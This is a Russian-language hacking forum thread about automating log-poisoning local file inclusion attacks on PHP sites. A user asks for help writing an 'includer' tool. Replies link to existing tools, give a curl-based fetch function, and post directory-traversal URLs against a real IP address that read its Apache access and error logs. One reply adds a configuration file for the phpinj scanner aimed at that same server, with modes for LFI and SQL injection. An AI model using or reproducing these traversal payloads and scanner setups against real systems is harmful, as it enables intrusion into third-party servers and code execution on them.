Всем привет. Может кто сталкивался с php инклудом, тем нужны были логи, чтобы ззабить туда пхп код и заинлудеть. Но мне в падлу переьеоать в ручную пути к логам. Вот я хочу написать сам скрипт на пхп. Я знаю токо основы пхп и прошу вашей помощи.

Помогите составить алгоритм. и я буду оч. признателен если кто напишет простенький каркас(основу) инлкдера.

ЗЫ готовый не предлагать. я юзал инлудер от Pashkela. Но он жопный. Плохо, медленно, и некаректно работает . и др. не лучше.


///

УДАЛИТЕ ТЕМУ УМАЛЯЮ

Как каркас можно использовать уже написанные. Благо их довольно много.
Мм и да, инклуд можно осуществить не только через логи )

_https://forum.antichat.ru/showpost.php?p=467814&postcount=2
Хм... архив у Электа битый... нашел тут:
_http://forum.blackhack.ru/showthread.php?t=2644

мой круче:))) Просто у ТС руки не из того места растут:)

https://forum.antichat.ru/thread127462.html
ппц

Если камушек в мой огород, то просто добавляем функцию получения информации через курлы:


function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/2008070208');
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}


и везде в коде scan меняем на get, и всё пашет, вот доказательства:


http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../var/log/apache2/access_log
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../var/log/apache2/error_log


просто через fsockopen не всегда почему-то дает парсить

phpinj.ini для конкретно данного случая:


;=========================================

MODE = 1 ; <= режим сканирования

;MODE = 1 - имеется LFI, при неправильном запросе ВИДЕН текст ошибки
;MODE = 2 - имеется LFI, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 3 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе ВИДЕН текст ошибки
;MODE = 4 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 5 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе ВИДЕН текст ошибки
;MODE = 6 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;=========================================
; url-для сканирования (начало)
;----------------------------------------------------------------------------------------------------
URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../"
;----------------------------------------------------------------------------------------------------
; url, которая вызывает ошибку
;----------------------------------------------------------------------------------------------------
ERROR_URL = ""
;----------------------------------------------------------------------------------------------------
; окончание url-для сканирования
;----------------------------------------------------------------------------------------------------
URL_END = ""
;----------------------------------------------------------------------------------------------------
; Текст ошибки, при вызове ошибочной страницы, четко показывающая, что искомый параметр не найден (если ошибки видны)
;----------------------------------------------------------------------------------------------------
ERROR_MESSAGE = Error
;----------------------------------------------------------------------------------------------------
PAUSE = 0 ; Пауза между запросами


Но с курлами будет работать только .php, .exe пахать не будет